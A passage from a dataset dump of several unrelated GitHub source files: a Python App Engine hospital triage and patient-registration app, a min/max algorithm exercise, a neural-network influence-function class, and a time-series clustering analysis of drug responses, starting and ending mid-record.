format='(%d-%m-%Y) %H:%M:%S'):\n return value.strftime(format)\n\nJINJA_ENVIRONMENT.filters['datetimeformat'] = datetimeformat\n\nDEFAULT_HOSPITAL_NAME = 'SGH'\n\n# We set a parent key on the 'Greetings' to ensure that they are all\n# in the same entity group. Queries across the single entity group\n# will be consistent. However, the write rate should be limited to\n# ~1/second.\n\ndef hospital_key(hospital_name=DEFAULT_HOSPITAL_NAME):\n \"\"\"Constructs a Datastore key for a Hospital entity.\n\n We use hospital_name as the key.\n \"\"\"\n return ndb.Key('Hospital', hospital_name)\n\n\nclass HospitalStaff(ndb.Model):\n \"\"\"Sub model for representing a hospital staff.\"\"\"\n identity = ndb.StringProperty(indexed=False)\n email = ndb.StringProperty(indexed=False)\n\n\nclass PatientProfile(ndb.Model):\n \"\"\"A main model for representing an individual Patient entry.\"\"\"\n hospitalStaff = ndb.StructuredProperty(HospitalStaff)\n # Profile information\n name = ndb.StringProperty()\n nric_num = ndb.StringProperty()\n gender = ndb.StringProperty(indexed=False)\n nationality = ndb.StringProperty(indexed=False)\n dob = ndb.StringProperty(indexed=False)\n race = ndb.StringProperty(indexed=False)\n mobile_number = ndb.StringProperty(indexed=False)\n address = ndb.StringProperty(indexed=False)\n zipcode = ndb.StringProperty(indexed=False)\n add_info = ndb.StringProperty(indexed=False)\n # Triage Readings\n date = ndb.DateTimeProperty(auto_now_add=True)\n travel_history = ndb.StringProperty(indexed=False)\n chief_complaint = ndb.StringProperty(indexed=False)\n classification = ndb.IntegerProperty(indexed=False)\n mouseArray = ndb.StringProperty(indexed=False)\n\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('main.html')\n self.response.write(template.render())\n\n\nclass ListAll(webapp2.RequestHandler):\n def post(self):\n nric_num = self.request.get('nric_num')\n self.redirect(\"/triage?nric=\" + nric_num)\n\n def get(self):\n hospital_name = self.request.get('hospital_name',\n DEFAULT_HOSPITAL_NAME)\n readings_query = PatientProfile.query(\n ancestor=hospital_key(hospital_name)).order(PatientProfile.date)\n readings = readings_query.fetch(100)\n\n user = users.get_current_user()\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n local_tz = pytz.timezone('Asia/Singapore')\n for reading in readings:\n dt = reading.date\n reading.date = dt.replace(tzinfo=pytz.utc).astimezone(local_tz).replace(tzinfo=None)\n\n template_values = {\n 'user': user,\n 'readings': readings,\n 'hospital_name': urllib.quote_plus(hospital_name),\n 'url': url,\n 'url_linktext': url_linktext,\n }\n\n template = JINJA_ENVIRONMENT.get_template('listall.html')\n self.response.write(template.render(template_values))\n\n\nclass Create(webapp2.RequestHandler):\n def get(self):\n nric_num = self.request.get('nric')\n if len(nric_num) == 0 :\n template_values = {\n 'nric_num': nric_num,\n }\n template = JINJA_ENVIRONMENT.get_template('registration.html')\n self.response.write(template.render(template_values))\n else:\n reading = PatientProfile.get_by_id(id=nric_num, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n template_values = {\n 'nric_num': nric_num,\n 'reading': reading\n }\n template = JINJA_ENVIRONMENT.get_template('registration_scanner.html')\n self.response.write(template.render(template_values))\n\n def post(self):\n # We set the same parent key on the 'PatientProfile' to ensure each\n # PatientProfile is in the same entity group. Queries across the\n # single entity group will be consistent. However, the write\n # rate to a single entity group should be limited to\n # ~1/second.\n patient_nric = self.request.get('nricNum')\n reading = PatientProfile( id=patient_nric, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n\n if users.get_current_user():\n reading.hospitalStaff = HospitalStaff(\n identity=users.get_current_user().user_id(),\n email=users.get_current_user().email())\n\n patient_name = self.request.get('name')\n patient_gender = self.request.get('gender')\n patient_dob = self.request.get('dob')\n patient_race = self.request.get('race')\n patient_mobile_num = self.request.get('mobile_number')\n patient_address = self.request.get('address')\n patient_zipcode = self.request.get('zipcode')\n patient_add_info = self.request.get('add_info')\n patient_nationality = self.request.get('nationality')\n\n # Do some input validation before putting data into Datastore\n #if patient_nric.isalnum() and len(patient_nric) == 9 : (remove this since ID is 3 digit)\n reading.name = patient_name\n reading.nric_num = patient_nric\n reading.gender = patient_gender\n reading.dob = patient_dob\n reading.race = patient_race\n reading.mobile_number = patient_mobile_num\n reading.address = patient_address\n reading.zipcode = patient_zipcode\n reading.add_info = patient_add_info\n reading.nationality = patient_nationality\n reading.put()\n\n query_params = {'hospital_name': DEFAULT_HOSPITAL_NAME}\n self.redirect(\"listall\")\n\n\nclass Triage(webapp2.RequestHandler):\n def get(self):\n i=0;\n w, h = 2, 10;\n a = [[0 for x in range(w)] for y in range(h)] \n print(\"a \")\n print(a)\n data = dataCapture()\n data.reverse()\n print(\"data \")\n print(data)\n \n # for response in data:\n response = data[0]\n time=datetime.datetime.fromtimestamp(int(response[0])).strftime('%d/%m %H:%M')\n datastring = str(response[1])\n a[h - 1][0] = time\n a[h - 1][1] = datastring\n # i = i + 1\n\n ic = icCapture()\n print(\"a again \")\n print(a)\n # count = PatientProfile.all(keys_only=True).count() + 1\n #count = 300 + 1\n #if (ic[0][1] == '') :\n # nric = count\n #else:\n nric = ic[0][1]\n nric_num = self.request.get('nric')\n if len(nric_num) == 0 :\n reading = PatientProfile.get_by_id(id=nric, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n print(reading)\n template_values = {\n 'nric_num': nric,\n 'a': a,\n #'nric_num': nric_num,\n #'reading' : PatientProfile.get_by_id(id=nric_num, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n 'time': time,\n 'datastring': datastring,\n 'reading': reading,\n }\n if reading == None :\n template = JINJA_ENVIRONMENT.get_template('triage.html')\n else :\n template = JINJA_ENVIRONMENT.get_template('triage_registered.html')\n \n self.response.write(template.render(template_values))\n else:\n reading = PatientProfile.get_by_id(id=nric_num, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n template_values = {\n 'time': time,\n 'datastring': datastring,\n 'a': a,\n 'nric_num': nric_num,\n 'reading': reading,\n }\n template = JINJA_ENVIRONMENT.get_template('triage_registered.html')\n self.response.out.write(template.render(template_values))\n # if reading.classification == 0:\n # measurements = classify_patient()\n # else:\n # measurements = {'bp': reading.bp, 'respo_rate': reading.respo_rate, 'temperature': round(reading.temperature, 1),\n # 'heart_rate': reading.heart_rate, 'classification': reading.classification}\n def post(self):\n # We set the same parent key on the 'PatientProfile' to ensure each\n # PatientProfile is in the same entity group. Queries across the\n # single entity group will be consistent. However, the write\n # rate to a single entity group should be limited to\n # ~1/second.\n patient_nric = self.request.get('nric')\n reading = PatientProfile( id=patient_nric, parent=hospital_key(DEFAULT_HOSPITAL_NAME))\n\n if users.get_current_user():\n reading.hospitalStaff = HospitalStaff(\n identity=users.get_current_user().user_id(),\n email=users.get_current_user().email())\n\n patient_name = self.request.get('name')\n patient_gender = self.request.get('gender')\n patient_dob = self.request.get('dob')\n patient_race = self.request.get('race')\n patient_mobile_num = self.request.get('mobile_number')\n patient_address = self.request.get('address')\n patient_zipcode = self.request.get('zipcode')\n patient_add_info = self.request.get('add_info')\n patient_nationality = self.request.get('nationality')\n # Get triage information\n patient_travel_history = self.request.get('travel_history')\n patient_chief_complaint = self.request.get('chief_complaint')\n patient_classification = self.request.get('classification')\n patient_mouseArray = self.request.get('mouseArray')\n\n # Do some input validation before putting data into Datastore\n #if patient_nric.isalnum() and len(patient_nric) == 9 : (remove this part since we ID is 3 digit)\n reading.name = patient_name\n reading.nric_num = patient_nric\n reading.gender = patient_gender\n reading.dob = patient_dob\n reading.race = patient_race\n reading.mobile_number = patient_mobile_num\n reading.address = patient_address\n reading.zipcode = patient_zipcode\n reading.add_info = patient_add_info\n reading.nationality = patient_nationality\n # Add triage information into database\n reading.travel_history = patient_travel_history\n reading.chief_complaint= patient_chief_complaint\n reading.classification = int(patient_classification)\n reading.mouseArray = patient_mouseArray\n reading.put()\n\n query_params = {'hospital_name': DEFAULT_HOSPITAL_NAME}\n self.redirect(\"listall\")\n\nclass Faq(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('faq.html')\n self.response.write(template.render())\n\n def post(self):\n self.redirect(\"/create\")\n\n\nclass Scan(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('scan.html')\n self.response.write(template.render())\n\nclass Data(webapp2.RequestHandler):\n def get(self):\n i=0;\n w, h = 2, 10;\n a = [[0 for x in range(w)] for y in range(h)] \n data = dataCapture()\n data.reverse()\n for response in data:\n time=datetime.datetime.fromtimestamp(int(response[0])).strftime('%Y-%m-%d %H:%M:%S')\n datastring = str(response[1])\n a[i][0] = time\n a[i][1]=datastring\n i = i + 1\n template_vars = {\n 'time': time,\n 'datastring': datastring,\n 'a': a,\n }\n template = JINJA_ENVIRONMENT.get_template('data.html')\n self.response.out.write(template.render(template_vars))\n\n\napp = webapp2.WSGIApplication([\n ('/', MainPage),\n ('/listall', ListAll),\n ('/create', Create),\n ('/triage', Triage),\n ('/faq', Faq),\n ('/scan', Scan),\n ('/data', Data)\n], debug=True)\n","repo_name":"sandeepdarknights/EG4301","sub_path":"Smartriage/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"31557024286","text":"from typing import List\n\n\ndef optimal_find_max_and_min(nums: List[int], n: int) -> List[int]:\n\t# 1개이면 이게 가장 큰 수인 동시에 작은 수이다.\n\tif n == 1:\n\t\treturn [nums[0], nums[0]]\n\tis_odd = True if n % 2 == 1 else False\n\tif is_odd:\n\t\tmax_num = min_num = nums[0]\n\telse:\n\t\tmax_num, min_num = (nums[0], nums[1]) if nums[0] > nums[1] else (nums[1], nums[0])\n\t# 홀수이면 1부터, 짝수이면 2부터\n\tstart = 1 if is_odd else 2\n\tfor i in range(start, n - 1, 2):\n\t\tif nums[i] < nums[i + 1]:\n\t\t\tif nums[i] < min_num:\n\t\t\t\tmin_num = nums[i]\n\t\t\tif nums[i+1] > max_num:\n\t\t\t\tmax_num = nums[i+1]\n\t\telse:\n\t\t\tif nums[i+1] < min_num:\n\t\t\t\tmin_num = nums[i+1]\n\t\t\tif nums[i] > max_num:\n\t\t\t\tmax_num = nums[i]\n\n\treturn [max_num, min_num]\n\nT = int(input())\nfor _ in range(T):\n\tn = int(input())\n\tnums = list(map(int, input().split()))\n\tprint(' '.join(map(str, optimal_find_max_and_min(nums, n))))\n","repo_name":"hyunjune-lee/python_algorithm_interview","sub_path":"Temp Storage/2021_Algorithm/06_선택/최댓값과 최솟값을 동시에.py","file_name":"최댓값과 최솟값을 동시에.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23271356235","text":"\"\"\"\nCreated on August 4, 2019\n\n@author: Mark Rothermel\n\"\"\"\n\nfrom src.genericNeuralNet import GenericNeuralNet # base model class for influence computation\n\nimport time # for timing SPN learning duration\nimport os\nimport numpy as np\nimport tensorflow as tf\n\n\nclass InterpretableNn(GenericNeuralNet):\n \"\"\"\n Neural network (NN) for multi-class classification, interpretable with influence functions.\n \"\"\"\n\n def __init__(self, output_node, sample_placeholder, label_placeholder, loss_op, **kwargs):\n self.output_node = output_node\n self.sample_placeholder = sample_placeholder\n self.label_placeholder = label_placeholder\n self.loss_op = loss_op\n\n super().__init__(batch_size=1,\n mini_batch=False,\n **kwargs)\n\n def placeholder_inputs(self):\n \"\"\"Returns the TensorFlow placeholders for sample and label input.\"\"\"\n sample_ph = self.sample_placeholder\n label_ph = self.label_placeholder\n return sample_ph, label_ph\n\n def get_all_params(self):\n \"\"\"Returns all trainable parameters of the model as a list of tf.Tensors.\"\"\"\n all_params = tf.trainable_variables()\n\n print(\"all_params:\", all_params)\n\n return all_params\n\n def loss(self):\n \"\"\"Generates the TF computation graph for the loss and returns the loss operator.\"\"\"\n prediction = self.output_node\n true_label = self.label_placeholder\n\n loss = tf.subtract(prediction, true_label, name=\"Total_Loss\")\n\n return self.loss_op\n\n # Influence function 2 (taken from influence function repository)\n def get_influence_on_test_loss(self, test_indices,\n train_idx,\n approx_type='cg',\n approx_params=None,\n force_refresh=True,\n test_description=None,\n loss_type='normal_loss',\n ignore_training_error=False,\n ignore_hessian=False,\n output_file=None):\n \"\"\"Influence function I_{up,loss} with option to ignore Hessian\"\"\"\n\n test_grad_loss_no_reg_val = self.get_test_grad_loss_no_reg_val(test_indices, loss_type=loss_type)\n\n norm = np.linalg.norm(np.concatenate([np.asarray(est).flatten() for est in test_grad_loss_no_reg_val]))\n print('Norm of test gradient: %s' % norm)\n\n start_time = time.time()\n\n if test_description is None:\n test_description = test_indices\n\n approx_filename = os.path.join(self.train_dir, '%s-%s-%s-test-%s.npz' % (\n self.model_name, approx_type, loss_type, test_description))\n if not ignore_hessian:\n if os.path.exists(approx_filename) and force_refresh == False:\n inverse_hvp = list(np.load(approx_filename, allow_pickle=True)['inverse_hvp'])\n print('Loaded inverse HVP from %s' % approx_filename)\n else:\n inverse_hvp = self.get_inverse_hvp(\n test_grad_loss_no_reg_val,\n approx_type,\n approx_params,\n output_file=output_file)\n np.savez(approx_filename, inverse_hvp=inverse_hvp)\n print('Saved inverse HVP to %s' % approx_filename)\n else:\n inverse_hvp = test_grad_loss_no_reg_val\n\n duration = time.time() - start_time\n print('Inverse HVP took %s sec' % duration)\n\n start_time = time.time()\n\n num_to_remove = len(train_idx)\n predicted_loss_diffs = np.zeros([num_to_remove])\n for counter, idx_to_remove in enumerate(train_idx):\n\n if not ignore_training_error:\n single_train_feed_dict = self.fill_feed_dict_with_one_ex(self.data_sets.train, idx_to_remove)\n train_grad_loss_val = self.sess.run(self.grad_total_loss_op, feed_dict=single_train_feed_dict)\n else:\n train_grad_loss_val = [np.ones(np.sum([np.prod(np.shape(param)) for param in self.params]))]\n train_grad_loss_val = [np.asarray(est).flatten() for est in train_grad_loss_val] # added\n inverse_hvp = [np.asarray(est).flatten() for est in inverse_hvp] # added\n predicted_loss_diffs[counter] = np.dot(np.concatenate(inverse_hvp),\n np.concatenate(train_grad_loss_val)) / self.num_train_examples\n\n duration = time.time() - start_time\n print('Multiplying by %s train examples took %s sec' % (num_to_remove, duration))\n\n return predicted_loss_diffs\n\n # Influence function 3 (taken from influence function repository and modified)\n def get_grad_of_influence_wrt_input(self, train_indices,\n test_indices,\n approx_type='cg',\n approx_params=None,\n force_refresh=True,\n verbose=True,\n test_description=None,\n loss_type='normal_loss',\n ignore_hessian=False,\n output_file=None):\n \"\"\"Influence function I_{pert,loss} with option to ignore Hessian\"\"\"\n\n # Calculate v_placeholder (gradient of loss at test point)\n test_grad_loss_no_reg_val = self.get_test_grad_loss_no_reg_val(test_indices, loss_type=loss_type)\n\n norm = np.linalg.norm(np.concatenate([np.asarray(est).flatten() for est in test_grad_loss_no_reg_val]))\n if verbose: print('Norm of test gradient: %s' % norm)\n\n start_time = time.time()\n\n if test_description is None:\n test_description = test_indices\n\n approx_filename = os.path.join(self.train_dir, '%s-%s-%s-test-%s.npz' % (\n self.model_name, approx_type, loss_type, test_description))\n\n if not ignore_hessian:\n if os.path.exists(approx_filename) and force_refresh == False:\n inverse_hvp = list(np.load(approx_filename, allow_pickle=True)['inverse_hvp'])\n if verbose: print('Loaded inverse HVP from %s' % approx_filename)\n else:\n inverse_hvp = self.get_inverse_hvp(\n test_grad_loss_no_reg_val,\n approx_type,\n approx_params,\n verbose=verbose,\n output_file=output_file)\n np.savez(approx_filename, inverse_hvp=inverse_hvp)\n if verbose: print('Saved inverse HVP to %s' % approx_filename)\n else:\n inverse_hvp = test_grad_loss_no_reg_val\n\n duration = time.time() - start_time\n if verbose: print('Inverse HVP took %s sec' % duration)\n\n grad_influence_wrt_input_val = None\n\n for counter, train_idx in enumerate(train_indices):\n # Put in the train example in the feed dict\n grad_influence_feed_dict = self.fill_feed_dict_with_one_ex(\n self.data_sets.train,\n train_idx)\n\n self.update_feed_dict_with_v_placeholder(grad_influence_feed_dict, inverse_hvp)\n\n # Run the grad op with the feed dict\n current_grad_influence_wrt_input_val = \\\n self.sess.run(self.grad_influence_wrt_input_op, feed_dict=grad_influence_feed_dict)[0][0, :]\n\n if grad_influence_wrt_input_val is None:\n grad_influence_wrt_input_val = np.zeros(\n [len(train_indices), len(current_grad_influence_wrt_input_val)])\n\n grad_influence_wrt_input_val[counter, :] = current_grad_influence_wrt_input_val\n\n return grad_influence_wrt_input_val\n\n def get_grad_loss_wrt_input(self, test_indices):\n \"\"\"Gets a list of test sample indices and returns a list\n of loss gradients regarding the inputs of each of the test samples.\"\"\"\n grads = []\n op = self.grad_loss_wrt_input_op\n\n # For each test sample get the loss gradient\n for i in test_indices:\n test_sample = self.data_sets.test.x[i]\n test_label = self.data_sets.test.labels[i]\n feed_dict = {\"Sample_Placeholder:0\": [test_sample],\n \"Label_Placeholder:0\": [test_label]}\n gradient = self.sess.run(op, feed_dict=feed_dict)\n grads = np.append(grads, gradient)\n\n d = self.grad_loss_wrt_input_op[0].shape[1].value\n return np.reshape(grads, (-1, d))\n","repo_name":"MaggiR/Interpreting-SPNs","sub_path":"src/InterpretableNn.py","file_name":"InterpretableNn.py","file_ext":"py","file_size_in_byte":8712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"11499130824","text":"import os, random, json\nimport numpy as np\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom PIL import Image\nfrom tslearn.clustering import TimeSeriesKMeans\nfrom scipy.signal import savgol_filter\nfrom sklearn import metrics\nfrom random import sample\nfrom math import ceil\n\nseed = 10\nrandom.seed(seed)\n\ndef run_clustering_methods(data,\n n_clusters,\n path_fig,\n path_out,\n hist_plot,\n cluster_plot,\n ):\n \"run clustering method on temporal distance files, and output cluster labels and a few diagnostic plots\"\n\n model = TimeSeriesKMeans(n_clusters= n_clusters,\n metric=\"dtw\",\n random_state=seed)\n\n model.fit(data)\n\n os.chdir(path_fig)\n\n ax = sns.histplot(data= model.labels_,\n kde=True,\n discrete = True\n )\n\n ax.set(xlabel='DTW K-means clusters={}'.format(str(n_clusters)))\n\n plt.savefig(\"hist-\" + hist_plot + 'cluster_n-' + str(n_clusters) + \".svg\",\n transparent = True, dpi = 1200)\n\n plt.close(\"all\")\n\n plt.figure()\n sz = data.shape[1]\n for cluster_id in range(0, max(model.labels_ + 1)):\n\n idx = model.labels_ == cluster_id\n\n data_clustered = data[np.array(idx),]\n\n plt.subplot(3, 3, cluster_id + 1)\n for xx in data_clustered:\n plt.plot(xx.ravel(), \"k-\", alpha=.2)\n\n plt.plot(savgol_filter(model.cluster_centers_[cluster_id].ravel(), 7, 2), \"r-\", linewidth = 2.5)\n plt.xlim(0, sz)\n plt.ylim(0, 1.2)\n plt.text(0.55, 0.85, 'Cluster %d' % (cluster_id),\n transform=plt.gca().transAxes)\n\n plt.tight_layout()\n\n plt.savefig('nclus' + str(n_clusters) + cluster_plot + '.svg')\n\n plt.close(\"all\")\n\n os.chdir(path_out)\n\n np.save('labels_nclus_' + str(n_clusters), model.labels_)\n\n\n\n return(model.labels_)\n\ndef cluster_eval_metrics(X,\n labels,\n metric = 'euclidean'):\n 'run evaluation metrics for different number of clusters'\n\n ss_metric = metrics.silhouette_score(X, labels, metric)\n\n ch_metric = metrics.calinski_harabasz_score(X, labels)\n\n db_metric = metrics.davies_bouldin_score(X, labels)\n\n return([ss_metric, ch_metric, db_metric])\n\ndef plot_eval_metrics(list_nclus,\n summary_eval_metrics,\n path_fig):\n # Create a subplot with 1 rows and 3 columns for visualize cluster evaluation metrics\n\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3)\n fig.set_size_inches(21, 7)\n\n ax1.plot(list_nclus, summary_eval_metrics[:, 0])\n\n ax1.set_title(\"The silhouette score for the various clusters.\")\n ax1.set_ylabel(\"Silhouette score\")\n ax1.set_xlabel(\"Cluster label\")\n\n ax2.plot(list_nclus, summary_eval_metrics[:, 1])\n\n ax2.set_title(\"The Calinski-Harabasz score for the various clusters.\")\n ax2.set_ylabel(\"Calinski-Harabasz score\")\n ax2.set_xlabel(\"Cluster label\")\n\n ax3.plot(list_nclus, summary_eval_metrics[:, 2])\n\n ax3.set_title(\"The Davies-Bouldin score for the various clusters.\")\n ax3.set_ylabel(\"Davies-Bouldin score\")\n ax3.set_xlabel(\"Cluster label\")\n\n os.chdir(path_fig)\n\n plt.savefig('cluster_eval_metrics.svg')\n\n plt.close(\"all\")\n\ndef drug_centric_analysis(metadata,\n cluster_labels,\n path_fig,\n heatmap_label\n ):\n \"run drug-centric analysis, to observe possible differences in drug effect from clustering analysis\"\n\n n_clusters = max(cluster_labels)\n\n drug_set = set(metadata['drug'])\n\n drugs = metadata['drug']\n\n clusters_by_drug = np.empty(shape=(0, n_clusters + 1))\n\n for drug in drug_set:\n if drug != \"PBS\":\n # drug = drug_set[1]\n idx = [x == drug for x in drugs]\n\n idx = np.array(idx, dtype='bool')\n\n drug_labels = np.array(cluster_labels)[idx]\n\n cluster_freq = []\n\n for cluster in range(0, n_clusters + 1):\n\n cluster_freq.append(sum(drug_labels == cluster) / len(drug_labels))\n\n cluster_freq = np.array(cluster_freq).reshape(1, n_clusters + 1)\n\n clusters_by_drug = np.append(clusters_by_drug, cluster_freq, axis=0)\n else:\n pass\n\n drug_names = [x for x in drug_set if x != \"PBS\"]\n\n heat = sns.heatmap(data = clusters_by_drug,\n linewidth=0.5,\n yticklabels=drug_names,\n cmap=\"YlOrBr\")\n\n plt.tight_layout()\n\n os.chdir(path_fig)\n\n plt.savefig('nclus_'+str(n_clusters+1)+heatmap_label+\".svg\", dpi=1200)\n\n plt.close(\"all\")\n\ndef cell_freq_by_cluster(metadata,\n cluster_labels,\n path_fig,\n heatmap_label\n ):\n \"run drug-centric analysis, to observe possible differences in drug effect from clustering analysis\"\n\n n_clusters = max(cluster_labels)\n\n cell_set = set(metadata['cell'])\n\n cells = metadata['cell']\n\n clusters_by_cell = np.empty(shape=(0, n_clusters + 1))\n\n for cell in cell_set:\n\n idx = [x == cell for x in cells]\n\n idx = np.array(idx, dtype='bool')\n\n cell_labels = np.array(cluster_labels)[idx]\n\n cluster_freq = []\n\n for cluster in range(0, n_clusters + 1):\n\n cluster_freq.append(sum(cell_labels == cluster) / len(cell_labels))\n\n cluster_freq = np.array(cluster_freq).reshape(1, n_clusters + 1)\n\n clusters_by_cell = np.append(clusters_by_cell, cluster_freq, axis=0)\n\n cell_names = [x for x in cell_set]\n\n heat = sns.heatmap(data = clusters_by_cell,\n linewidth=0.5,\n yticklabels=cell_names,\n cmap=\"YlOrBr\")\n\n plt.tight_layout()\n\n os.chdir(path_fig)\n\n plt.savefig('nclus_'+str(n_clusters+1)+heatmap_label+\".svg\", dpi=1200)\n\n plt.close(\"all\")\n\n\ndef cell_centric_analysis(metadata,\n cluster_labels,\n path_fig,\n heatmap_label):\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n for cell in set(cells):\n \"generate cell-centric results for multiple drugs and their concentrations\"\n #cell = 'SKMEL2'\n\n idx = [x == cell for x in cells]\n idx = np.array(idx, dtype='bool')\n\n drug_sub = np.array(drugs)[idx]\n conc_sub = np.array(concs, dtype='float')[idx]\n label_sub = np.array(cluster_labels)[idx]\n\n drug_label = np.empty(shape=(0,5))\n\n drug_name = []\n\n for drug in set(drug_sub):\n if drug != 'PBS':\n #drug = drug_sub.item(0)\n idx_drug = [x == drug for x in drug_sub]\n idx_drug = np.array(idx_drug, dtype='bool')\n\n conc_drug = conc_sub[idx_drug]\n\n if len(conc_drug) == 5:\n\n label_drug = label_sub[idx_drug]\n\n conc_sort = conc_drug.argsort()\n\n label_drug = label_drug[conc_sort[::-1]]\n\n label_drug = label_drug.reshape(1, 5)\n\n drug_label = np.append(drug_label, label_drug, axis=0)\n\n drug_name.append(drug)\n\n else:\n pass\n else:\n pass\n\n new_path = path_fig+'\\\\'+'cell-analysis'\n\n if os.path.exists(new_path) == False:\n os.makedirs(new_path)\n else:\n pass\n\n os.chdir(new_path)\n\n #print(new_path)\n\n heat = sns.heatmap(drug_label,\n yticklabels = drug_name,\n annot=True\n )\n\n plt.savefig(cell+\"_\"+heatmap_label+\".svg\")\n\n #plt.show()\n plt.close(\"all\")\n\n del new_path\n\ndef max_conc_analysis(metadata,\n cluster_labels,\n path_fig,\n heatmap_label):\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n iter_cells = set(cells)\n iter_drugs = set(drugs)\n\n comb_array = np.empty(shape = (len(iter_cells), len(iter_drugs)))\n comb_array = pd.DataFrame(comb_array, columns=iter_drugs, index=iter_cells)\n\n\n for cell in iter_cells:\n \"generate cell-centric results for multiple drugs and their concentrations\"\n #cell = 'SKMEL2'\n\n idx = [x == cell for x in cells]\n idx = np.array(idx, dtype='bool')\n\n drug_sub = np.array(drugs)[idx]\n conc_sub = np.array(concs, dtype='float')[idx]\n label_sub = np.array(cluster_labels)[idx]\n\n for drug in iter_drugs:\n if drug != 'PBS':\n #drug = \"Methotrexate\"\n idx_drug = [x == drug for x in drug_sub]\n idx_drug = np.array(idx_drug, dtype='bool')\n\n conc_of_drug = conc_sub[idx_drug]\n label_of_drug = label_sub[idx_drug]\n\n max_conc = max(conc_of_drug)\n\n label_at_max_conc = label_of_drug[conc_of_drug == max_conc]\n\n comb_array[drug][cell] = label_at_max_conc\n\n comb_array = comb_array.drop(\"PBS\", axis = 1)\n\n os.chdir(path_fig)\n\n my_colors = ['xkcd:grey', 'xkcd:orange', 'xkcd:apple green','xkcd:red']\n\n drug_names = [x for x in iter_drugs if x != \"PBS\"]\n\n heat = sns.clustermap(comb_array,\n yticklabels=iter_cells,\n xticklabels=drug_names,\n cmap = my_colors,\n metric = 'correlation'\n )\n\n heat.cax.set_visible(False)\n\n plt.tight_layout()\n\n plt.savefig(heatmap_label+\".svg\", transparent = True, dpi = 1200)\n\ndef drug_conc_centric_analysis(metadata,\n cluster_labels,\n path_fig):\n\n \"run drug-centric analysis, to observe possible differences in drug effect from clustering analysis\"\n\n n_clusters = max(cluster_labels)\n\n drug_set = list(set(metadata['drug']))\n\n drugs = metadata['drug']\n concs = metadata['conc']\n\n clusters_by_drug = np.empty(shape=(0,n_clusters+1))\n\n\n os.chdir(path_fig)\n\n pie_size = 1\n\n ncol = 2\n nrow = ceil(len(drug_set) / ncol)\n\n\n fig, ax = plt.subplots(nrow, ncol, figsize=(10, 40))\n\n count = 0\n\n for i, ax_row in enumerate(ax):\n for j, axes in enumerate(ax_row):\n\n drug = drug_set[count]\n\n\n idx = [x == drug for x in drugs]\n idx = np.array(idx, dtype='bool')\n\n conc_sub = np.array(metadata['conc'])[idx]\n drug_labels = np.array(cluster_labels)[idx]\n\n cluster_freq = np.empty(shape=(n_clusters+1, 5))\n\n if drug != 'PBS':\n if len(set(conc_sub)) == 5:\n\n for cluster in range(0,n_clusters+1):\n\n #cluster = 0\n idx_cluster = [x == cluster for x in drug_labels]\n idx_cluster = np.array(idx_cluster, dtype='bool')\n\n conc_labels_sub = conc_sub[idx_cluster]\n count_conc = 0\n for conc in sorted(set(conc_sub), reverse=False):\n #conc = conc_sub[1]\n\n cluster_freq[cluster,count_conc] = sum(conc_labels_sub == conc) / sum(idx_cluster)\n\n count_conc += 1\n\n axes.set_title(str(drug).format(i, j))\n axes.set_yticklabels([])\n axes.set_xticklabels([])\n\n conc_iter = cluster_freq[:, 4].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=1,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 3].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.85,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 2].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.70,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 1].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.55,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n conc_iter = cluster_freq[:, 0].reshape(1, n_clusters + 1)\n\n axes.pie(conc_iter.sum(axis=0), radius=0.40,\n wedgeprops=dict(width=0.3, edgecolor='w'), normalize=True,\n colors=['xkcd:grey', 'xkcd:orange', 'xkcd:apple green',\n 'xkcd:red']\n )\n\n else:\n pass\n # axes.set_title(str(drug).format(i, j))\n # axes.set_yticklabels([])\n # axes.set_xticklabels([])\n #\n # plt.plot()\n\n else:\n pass\n # axes.set_title(str(drug).format(i, j))\n # axes.set_yticklabels([])\n # axes.set_xticklabels([])\n\n # plt.plot()\n\n\n count += 1\n\n plt.tight_layout()\n plt.savefig(\"drug-conc_pie-plots.svg\", transparent = True, dpi = 1200)\n plt.close(\"all\")\n\ndef conc_centric_analysis(metadata,\n cluster_labels,\n path_fig):\n drugs = metadata['drug']\n cells = metadata['cell']\n concs = metadata['conc']\n\n conc_summary_by_label = np.zeros(shape=(5, len(set(cluster_labels))))\n\n for drug in set(drugs):\n \"generate concentration-centric results\"\n #drug = 